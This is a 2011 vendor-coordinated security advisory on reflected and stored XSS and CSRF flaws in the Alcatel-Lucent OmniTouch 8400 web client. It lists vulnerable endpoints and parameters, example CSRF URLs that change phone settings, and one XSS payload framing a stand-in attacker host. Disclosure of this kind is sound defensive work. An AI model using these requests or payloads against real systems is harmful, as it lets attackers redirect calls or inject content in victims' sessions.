TC-SA-2011-01: Multiple vulnerabilities in OmniTouch Instant Communication Suite Published: 2011/10/24 Advisory-Version: 1.0 References: - Alcatel Lucent Vulnerability Statement 2011003 Multiple vulnerabilities in OmniTouch Instant Communication Suite - CVE-2011-4058 - multiple XSS vulnerabilities in Alcatel-Lucent OmniTouch 8400 Instant Communication Suite - CVE-2011-4059 - multiple CSRF vulnerabilities in Alcatel-Lucent OmniTouch 8400 Instant Communication Suite - Cert-IST reference number: Cert-IST/AV-2011.583 - URL of this advisory (used for updates): http://www.tele-consulting.com/advisories/TC-SA-2011-01.txt Affected products: Alcatel Lucent OmniTouch 8400 Instant Communications Suite (ICS) Version 6.1 Patch 102a (older releases have not been tested) Summary: Alcatel Lucent's ICS offers Unified Communication services over several access ways, like handhelds and web-clients. The web-client WebICS offers end users services like access to personal and global address books, initiate calls, call redirects etc. Several common flaws could be found in WebICS like reflected and stored XSS as well as CSRF. In Webadmin reflected XSS could be found. Possible Effects: One could use a stored XSS in the phonebook and change the end users phone configuration like DND or call redirect. Vulnerable Scripts WebICS: CSRF - /websoftphone/servlet/DispPhoneSet - /websoftphone/servlet/DispRTC - /websoftphone/servlet/DispPhoneSet stored XSS: - all Input-Fields of the phonebook reflected XSS: - /websoftphone/jsp/CBCallBackCont.jsp, parameter list - /websoftphone/jsp/PhoneBookCont.jsp, parameter udatab - /websoftphone/jsp/CustoData.jsp, parameter openwin - /websoftphone/jsp/RTCNavigator.jsp, parameter sessionid - /websoftphone/servlet/DispLogon, parameter next - /websoftphone/servlet/DispLogon, parameter main Vulnerable Scripts WebAdmin: reflected XSS: - /ClientMgmt/ClientMgmt, parameter action Examples CSRF: - Lock a phone https://webics.yourdomain.local/websoftphone/servlet/ \ DispPhoneSet?method=setLock - Dial https://webics.yourdomain.local/websoftphone/servlet/ \ DispRTC?method=makeCall&number=XXXX - Set DND https://webics.yourdomain.local/websoftphone/servlet/ \ DispPhoneSet?method=setDoNotDisturb - Set call forward https://webics.yourdomain.local/websoftphone/servlet/ \ DispPhoneSet?method=setForward&type=immediate& \ FwdTarget=onSomeone&number=xxxx https://webics.yourdomain.local/websoftphone/jsp/ \ CBCallBackCont.jsp?list=%22%3E%3CFRAME%20SRC=%22 \ http://www.boeserangreifer.de%22%3E%3C&rand=0 Possible solutions: - install the vendor supplied hotfix Disclosure Timeline: 2011/02/17 vendor contacted via psirt.security@alcatel-lucent.com 2011/02/18 initial vendor response 2011/06/27 vendor sent an internal advisory to business partners for some reflected XSS issues 2011/07/20 vendor sent an updated internal advisory to business partners included a hotfix for some reflected XSS issues 2011/09/06 vendor sent an updated internal advisory to business partners 2011/09/26 vendor sent an updated internal advisory to business partners addressing all issues 2011/10/24 coordinated public disclosure Credits: Tobias Glemser (tglemser@tele-consulting.com) Tele-Consulting security networking training GmbH, Germany www.tele-consulting.com Disclaimer: All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore Tele-Consulting shall not be liable for any direct or indirect damages that might be caused by using this information.